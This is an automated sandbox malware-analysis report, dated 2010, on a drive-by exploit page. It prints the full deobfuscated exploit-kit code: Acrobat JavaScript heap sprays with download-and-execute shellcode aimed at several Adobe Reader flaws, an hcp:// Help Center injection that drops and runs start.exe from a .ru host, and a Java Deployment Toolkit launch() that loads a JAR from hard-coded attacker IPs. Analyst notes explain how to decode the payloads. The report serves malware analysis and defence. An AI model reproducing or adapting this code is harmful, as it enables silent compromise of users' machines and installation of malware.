Analysis report for http://peninsula.co.nz/x.html
Sample Overview
| URL | http://peninsula.co.nz/x.html |
|---|---|
| MD5 | a237ffa8d4140ea856e10f2e3f1542b9 |
| Analysis Started | 2010-08-06 07:18:43 |
| Report Generated | 2010-08-06 07:19:09 |
| Jsand version | 1.02.02 |
See the report for domain peninsula.co.nz.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.02.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |

Note: only the two signatures above matched. The deobfuscated Acrobat JavaScript below branches on `app.viewerVersion` and, with the same sprayed heap, also reaches `Collab.collectEmailInfo` (version < 8) and `media.newPlayer` (version == 9.2); the HTML written into the page additionally carries two non-Adobe vectors, an `hcp://` iframe for IE 7 and a Java Deployment Toolkit `launch()` call. None of these are listed here, so treat this table as a lower bound on what the sample targets.
Deobfuscation results
Evals
The strings below were handed to eval() at runtime. The long third string is Acrobat JavaScript (it uses `this.info`, `app.viewerVersion`, `util.printf` and `Collab`), so it executes inside Adobe Reader from the embedded PDF rather than in the browser. bC() assembles the shellcode from a fixed `%u`-encoded stub (`hO`) plus a download URL that is recovered from the PDF's Author and Title metadata through a substitution alphabet keyed on the custom info entry `j` (fE()/lU()), with `reader_version=<app.viewerVersion>` appended; dK() then heap-sprays 0x90 sleds plus that shellcode toward 0x0c0c0c0c (0x30303030 on the util.printf and media.newPlayer paths) before the version-dependent trigger fires. Analyst tip: the script sets a debug flag when the PDF Producer field starts with "debug" and then prints the decoded URL via app.alert(), which lets you extract the download URL from a captured Notes10.pdf without running the exploit.
- (repeated 1 time)
Drtfnpj8 = 'U';
- (repeated 1 time)
document - (repeated 1 time)
var l = { n : 30946 } ; try { var gX = 'z'.substring(13408) } catch (gX){ } ; var wP = { f : 23228 } ; try { var lI = 'jU'.substring(4283) } catch (lI){ } ; var mD = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#'; iL = 3230; iL += 180; yN = 15450; yN += 80; var gJ = new Array(); var hG = this .info['j'].replace(/[\s]/g, ''); try { var lM = 'jC'.substring(25941, 25941) } catch (lM){ } ; try { var yT = 'yX'.substring(1766, 1766) } catch (yT){ } ; try { var mV = 'pU'.substring(21794, 21794) } catch (mV){ } ; var wRO = this .info; var qR = (wRO.producer.substr(0, 5) == 'debug'); var nC = new Array(); var sV = "%u"; function xE(str){ str = str.split(sV); var ret = ""; for (var iin str){ if (str[i] != "")ret += String.fromCharCode(parseInt(str[i], 16)); } return ret; } function gR(str1, str2){ return [str1, str2].join(""); } function bC(gJG){ var eR = fE(); var qX = fA(); eR += ((eR.indexOf("?") > - 1) ? "&" : "?") + "reader_version=" + qX; if (qR)app.alert("URL: " + eR); eR = oN(eR); var d = sV; var hO = d + "C033" + d + "8B64" + d + "3040" + d + "0C78" + d + "408B" + d + "8B0C" + d + "1C70" + d + "8BAD" + d + "0858" + d + "09EB" + d + "408B" + d + "8D34" + d + "7C40" + d + "588B" + d + "6A3C" + d + "5A44" + d + "E2D1" + d + "E22B" + d + "EC8B" + d + "4FEB" + d + "525A" + d + "EA83" + d + "8956" + d + "0455" + d + "5756" + d + "738B" + d + "8B3C" + d + "3374" + d + "0378" + d + "56F3" + d + "768B" + d + "0320" + d + "33F3" + d + "49C9" + d + "4150" + d + "33AD" + d + "36FF" + d + "BE0F" + d + "0314" + d + "F238" + d + "0874" + d + "CFC1" + d + "030D" + d + "40FA" + d + "EFEB" + d + "3B58" + d + "75F8" + d + "5EE5" + d + "468B" + d + "0324" + d + "66C3" + d + "0C8B" + d + "8B48" + d + "1C56" + d + "D303" + d + "048B" + d + "038A" + d + "5FC3" + d + "505E" + d + "8DC3" + d + "087D" + d + "5257" + d + "33B8" + d + "8ACA" + d + "E85B" + d + "FFA2" + d + "FFFF" + d + "C032" + d + "F78B" + d + "AEF2" + d + "B84F" + d + "2E65" + d + "7865" + d + 
"66AB" + d + "6698" + d + "B0AB" + d + "8A6C" + d + "98E0" + d + "6850" + d + "6E6F" + d + "642E" + d + "7568" + d + "6C72" + d + "546D" + d + "8EB8" + d + "0E4E" + d + "FFEC" + d + "0455" + d + "5093" + d + "C033" + d + "5050" + d + "8B56" + d + "0455" + d + "C283" + d + "837F" + d + "31C2" + d + "5052" + d + "36B8" + d + "2F1A" + d + "FF70" + d + "0455" + d + "335B" + d + "57FF" + d + "B856" + d + "FE98" + d + "0E8A" + d + "55FF" + d + "5704" + d + "EFB8" + d + "E0CE" + d + "FF60" + d + "0455"; hO += eR; return xE(hO); } ; function fE(){ var qXY = (wRO.author + wRO.title).replace(/[\s]/g, ''); var aZ = lU(qXY, hG, mD); return aZ; } ; function lU(qXY, mD, hG){ var aZ = ""; for (var i = 0; i < qXY.length; i ++ ){ var gP = mD.indexOf(qXY[i]); if (gP > - 1){ aZ += hG[gP]; } } return aZ; } ; function oN(qXY){ var out = ""; qXY = xEZ(qXY); g = Math.round(qXY.length / 4); if (g != qXY.length / 4)qXY += "00"; for (var i = 0; i < qXY.length; i += 4){ out += sV + qXY.substr(i + 2, 2) + qXY.substr(i, 2); } return out; } ; function xEZ(s){ var i, f = 0, a = []; s += ''; f = s.length; for (i = 0; i < f; i ++ ){ a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/, "0$1").toUpperCase(); } return a.join(''); } ; function hK(sP, len){ while (sP.length * 2 < len){ sP = gR(sP, sP); } return sP.substring(0, len / 2); } ; function dK(aH){ var jA = 0x0c0c0c0c; iR = bC("pdf"); if (aH == 1){ jA = 0x30303030; } var nK = 0x400000; var ln = iR.length * 2; var qHM = nK - (ln + 0x38); var sP = xE(sV + "9090" + sV + "9090"); sP = hK(sP, qHM); var wH = (jA - 0x400000) / nK; for (var rU = 0; rU < wH; rU ++ ){ nC[rU] = gR(sP, iR); } } ; function fA(){ try { return app.viewerVersion.toString(); } catch (kDY){ return 0; } } if (qR)app.alert("called exploit"); var qX = fA(); if (qR)app.alert("v: " + qX); if (qX > 8){ if (qR)app.alert("util.printf"); dK(1); var kT = "12999999999999999999"; for (fS = 0; fS < 276; fS ++ )kT += "8"; util.printf("%45000f", kT); } if (qX < 8){ if 
(qR)app.alert("Collab.collectEmailInfo"); dK(0); var uF = xE(sV + "0c0c" + sV + "0c0c"); while (uF.length < 44952)uF += uF; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : uF } ); } if (qX < 9.1){ if (app.doc.Collab.getIcon){ if (qR)app.alert("Collab.getIcon"); dK(0); var fU = unescape("%09"); while (fU.length < 0x4000)fU += fU; fU = "N." + fU; app.doc.Collab.getIcon(fU); } } if (qX == 9.2){ if (qR)app.alert("media.newPlayer"); dK(1); var sf = "1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch (e){ } util.printd(sf, new Date()); } var rA = ["h", "rI"]; wFC = 25149; wFC--; var bE = { } ; var uN = { fMN : false } ;
Writes
The following content was injected into the page with document.write(). The first write is a script that does three things in order. (1) On IE 7 only (`document.all` and `navigator.appVersion` containing "MSIE 7."), it writes an iframe whose `hcp://` URL (the Windows Help and Support Center protocol handler) reaches sysinfomain.htm through a run of malformed `%A%` escapes and `..%5C..%5C` traversal and smuggles a `<script defer>` in the `svr=` parameter. Double-URL-decoding that parameter and undoing its `C`→`"`, `5`→`=`, `9`→`'` substitutions and string reversal yields a WScript.Shell command that echoes a `.js` dropper into the parent directory, runs it with cscript, deletes it, executes the dropped `start.exe` and runs `taskkill /F /IM help*`; the dropper fetches `http://blockcotopus.ru:8080/welcome.php?id=1&pid=10` with Microsoft.XMLHTTP and writes the response body to `start.exe` via ADODB.Stream. (2) If either the AcroPDF.PDF or PDF.PdfCtrl ActiveX control instantiates, it appends an iframe to Notes10.pdf (the PDF whose JavaScript is shown above). (3) If `navigator.javaEnabled()`, it appends an iframe to Applet10.html and then calls `launch()` on the Java Deployment Toolkit (clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA on IE, the npruntime / java-deployment-toolkit plugin objects elsewhere) with `http: -J-jar -J\\<ip>\public\0010.jar none`, `<ip>` chosen at random from ten hard-coded addresses; the `-J` options are passed through as JRE arguments so the JAR is loaded directly from the attacker's share. The second write is the same `hcp://` iframe as emitted; the third is a 1×1 `/counter.php` tracking image.
- (repeated 1 time)
<script language="javascript">if ((document.all) && (navigator.appVersion.indexOf('MSIE 7.') !=- 1))document.write(" <iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape% 28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2 B..%252F%2526echo%2Bfunction%2Baa%2528bb%2529%257Br599%253Bfor%2528i5bb.length%253Bi%253E5 0%253Bi--%2529r%252B5bb.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528aa%25289%2 53B%25292%252CCexe.tratsC%2528%255DCeliC%252BCFoTevaSC%255Bo%253B%2529%255DCydoBesnoC%252B CpserC%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B15epyT.o%253B35edoM.o%253B%2529llun%2528 dnes.x%253B%25290%252CC015dip%252615di%253Fphp.emoclew%252F0808%253Aur.supotcokcolb%252F%2 52F%253AptthC%252CCTEGC%2528nepo.x%253B%2529CPTTHLC%252BCMX.tfosorciMC%2528a%2Bwen5x%253B% 2529y%2528a%2Bwen5o%253BCmaertS.BDODAC5y%253B%255DCtceC%252BCjbOXeviC%252BCtcAC%255Bsiht%2 B5%2Ba9%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526star t.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FC%252Fg%252CString .fromCharCode%252834%2529%2529.replace%2528%252F5%252Fg%252CString.fromCharCode%252861%252 9%2529.replace%2528%252F9%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529% 27%29%29%3C%2Fscript%3E\"></iframe>"); Wyzaqd205 = new 
Array("AcroPDF.PDF", "PDF.PdfCtrl"); for (iin Wyzaqd205){ try { O91v83pz = new ActiveXObject(Wyzaqd205[i]); if (O91v83pz){ H7jhl9 = document.createElement("iframe"); H7jhl9.setAttribute("src", "Notes10.pdf"); document.body.appendChild(H7jhl9); } } catch (e){ } } try { if (navigator.javaEnabled()){ Tpnu7tw = document.createElement("iframe"); Tpnu7tw.setAttribute("src", "Applet10.html"); document.body.appendChild(Tpnu7tw); } } catch (e){ } try { if (navigator.javaEnabled()){ var ips = ["203.81.55.153", "207.38.126.66", "70.38.64.49", "74.208.173.189", "79.99.133.99", "83.222.30.178", "91.121.92.165", "91.135.228.235", "91.203.133.223", "94.23.211.84"]; var ip = ips[Math.round(Math.random() * (ips.length - 1))]; var u = "http: -J-jar -J\\\\" + ip + "\\public\\0010.jar none"; if (window.navigator.appName == "Microsoft Internet Explorer"){ var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"; o.launch(u); } else { var o = document.createElement("OBJECT"); var n = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"; n.type = "application/java-deployment-toolkit"; document.body.appendChild(o); document.body.appendChild(n); try { o.launch(u); } catch (e){ n.launch(u); } } } } catch (e){ } </script>
- (repeated 1 time)
<iframe src= "hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28un escape%28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2B.. %252F%2526echo%2Bfunction%2Baa%2528bb%2529%257Br599%253Bfor%2528i5bb.length%253Bi%253E50%253Bi--%252 9r%252B5bb.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528aa%25289%253B%25292%252CCexe.trat sC%2528%255DCeliC%252BCFoTevaSC%255Bo%253B%2529%255DCydoBesnoC%252BCpserC%255Bx%2528etirW.o%253B%252 9%2528nepO.o%253B15epyT.o%253B35edoM.o%253B%2529llun%2528dnes.x%253B%25290%252CC015dip%252615di%253F php.emoclew%252F0808%253Aur.supotcokcolb%252F%252F%253AptthC%252CCTEGC%2528nepo.x%253B%2529CPTTHLC%2 52BCMX.tfosorciMC%2528a%2Bwen5x%253B%2529y%2528a%2Bwen5o%253BCmaertS.BDODAC5y%253B%255DCtceC%252BCjb OXeviC%252BCtcAC%255Bsiht%2B5%2Ba9%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252 Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FC%252Fg%252 CString.fromCharCode%252834%2529%2529.replace%2528%252F5%252Fg%252CString.fromCharCode%252861%2529%2 529.replace%2528%252F9%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2 Fscript%3E"></iframe>
- (repeated 1 time)
<img src="/counter.php?nocache=42865&aid=&said=" width=1 height=1>
Network Activity
Requests
Notes10.pdf was fetched from yummyeyes.ru:8080, which is consistent with the relative `src="Notes10.pdf"` in the written script resolving against that origin. Applet10.html, the 0010.jar share fetch and the decoded `hcp://` payload's download host (blockcotopus.ru:8080) do not appear below, so the sandbox evidently did not exercise those stages; the requests to spruceteam.com are not explained by the deobfuscated code shown on this page.
| URL | Status | Content Type |
|---|---|---|
| http://peninsula.co.nz/x.html | 200 | text/javascript |
| about:blank | 200 | text/html |
| http://yummyeyes.ru:8080/index.php?pid=10 | 200 | text/html |
| http://yummyeyes.ru:8080/jquery.jxx?v=5.3.4 | 200 | text/javascript |
| http://yummyeyes.ru:8080/Notes10.pdf | 200 | application/pdf |
| http://spruceteam.com | 200 | text/html |
| http://spruceteam.com/themes/card.js | 200 | text/html |
Redirects
No redirects.
ActiveX controls
| Control | Attributes / methods | Acrobat JavaScript |
|---|---|---|
| AcroPDF.PDF | No attribute setting or method call detected | see the call table below |
Acrobat JavaScript calls observed (AcroPDF.PDF)
| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| info.Author | | | 2 |
| info.j | | | 1 |
| util.printf | %45000f | 12999999999999999999 followed by 276 × "8" (296 characters, as built by the `kT` loop above) | 1 |
| Collab.getIcon | "N." followed by 0x4000 (16384) tab (0x09) characters, rendered as dots in the raw log with "other 15840 bytes" elided | | 1 |
| info.Producer | | | 1 |
| info.Title | | | 2 |
| Control | Attributes / methods |
|---|---|
| PDF.PdfCtrl | No attribute setting or method call detected |
| clsid:ca8a9780-280d-11cf-a24d-444553540000 | No attribute setting or method call detected |
Shellcode and Malware
No shellcode was identified by the automated extractor. This is a false negative: the deobfuscated Acrobat JavaScript above assembles a `%u`-encoded shellcode stub in bC() (the `hO` string), appends the decoded download URL to it and heap-sprays the result in dK(). Decoding the `%u` words (xE()) recovers the bytes; the stub pushes the strings "urlm"/"on.d" and ".exe", so it appears to be a urlmon-based download-and-execute stub — confirm by disassembly.
No additional malware was retrieved. The second-stage binary (`start.exe` from blockcotopus.ru:8080/welcome.php per the decoded `hcp://` payload), 0010.jar, and whatever the Acrobat shellcode downloads were therefore not captured; Notes10.pdf, fetched above, is the only payload available from this run.